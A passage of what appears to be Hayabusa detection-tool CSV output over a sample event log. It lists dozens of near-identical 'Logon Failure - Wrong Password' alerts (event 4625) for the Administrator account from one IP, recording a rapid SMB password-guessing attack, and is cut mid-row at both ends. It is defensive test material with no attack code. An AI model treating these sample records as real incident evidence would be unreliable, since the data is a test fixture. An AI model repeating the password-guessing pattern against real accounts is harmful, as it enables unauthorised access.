NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.380 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IBogtzE6No62tJB9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.416 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QQJICDi3T4LiwXZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnlKkfHYT0ID3BWr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.510 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gw36XaWrYp2M9CZd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.544 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9aT76CAAER0H98I | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.580 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TEOZfrP3IYmutAuq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.628 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zd54DAwwp0BJhhaZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AR6Gc128RlPtwcPl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.713 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cpjS1YZy2sSRqzI3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.756 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EKeate89Gw1oEp0U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.801 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tBhApsBYa65Hxr0L | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.894 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ITv5RS3WHhWe0Hez | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.940 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WASvcAp9zfU3uSka | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:38.972 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H1f6szOactEp5ntF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.008 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Loe5RkT9Ki0Aw2Lv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TJdVtE7dNSoyM3LI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.092 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QlAtU1mIO7m5DnuP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.132 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wAK2rh94yKwiH2Nw | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AuqsvmUbPlpWFBRZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.208 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BShEB6VnXkOxwtFB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AjAc5QMvpTBsDziO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Fwwp5CD20dR8QrIo | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.329 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tL6GzVzndZL7DZMN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.371 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zK5IpESvDA2DexwL | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qvTyabCyGaxscOrN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.437 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FW8VghddPwP5C6dO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.476 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xGZuyZ0LErZ3Sgty | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.515 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bT1xrvfndr5R8Vg3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.560 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: H6RFTZVJE9remzqs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.599 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: pzjwzORvTwuBPLEs | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.644 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UMjSFfZ88BV2sT1F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.681 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SnpCLI2EJZRhr3vz | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.724 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ztEU2m9SwbqgSdVY | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.760 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MHO1X0zwmoWotcM4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.796 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ck429g2Cs4siVVq4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.835 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9txH9zA3oY885iTi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.876 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: alIIEzE2rTrNtOtr | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.921 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Ww4BXLwhaNxOttgo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:39.977 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GPdz2pjDocMWqctT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QOm1i2a20IDNmIu4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.056 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ukSrSu516dHlHQ94 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: grdERCipFl1FMB1o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.129 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmpuUsIRbp57KCRD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VWLuqrOQSQuqcwUr | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eEASOf84AX8ow4vf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.254 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: IcgNTGlESh6FytEY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.302 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OeVo7D3oBsdUMHfj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.348 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mLqSB2yGMksaBgUS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.396 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: y7qRzzpL2YhfIGSD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.437 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VvE5tMw3MjDhA0Fe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.488 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: aXuNgOkIzvKIuJki | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.528 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: q8vPHEXrxVpUyKZq | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.581 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Vk7sh6VM7AZQv2in | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jurt5hAg90y1VWdT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.660 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MlrPbTbJRTxFakiv | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.700 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ5cWmYL8weCCRT0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.742 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: k0v2Emgn7BD1STZl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.795 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MJppWxAiNJ4D0s2U | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.853 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: zHVcJEec3y6v9gIo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:40.918 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 68RKE5dS8X5Px2gR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.010 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Np8mTqhr7QasXk1e | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.065 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MhpDNDIPVyRlfej8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.118 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qZtmxGeLj25VSUcm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.166 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SPN8w8WghBYzChZc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.205 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 36hmbCuKxF9Dt4vR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.248 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TALpRirdvB9a8y6M | IP Addr: 192.168.198.149 | AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.292 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wvEvwFeXGOgycZvA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.328 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5ppxeOgZNua2Ieuc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.387 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: n4U5XdQu1YtSat7J | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.438 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MN0OfYE6vPgqyyZN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.494 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MmfCPIdiTH9gG2qZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.540 
+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UtcHAxmfDL9C9uZa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5TX62kMSJqq0Lv8o | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.624 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hA20OdabfW5DMphV | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-20 01:50:41.665 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 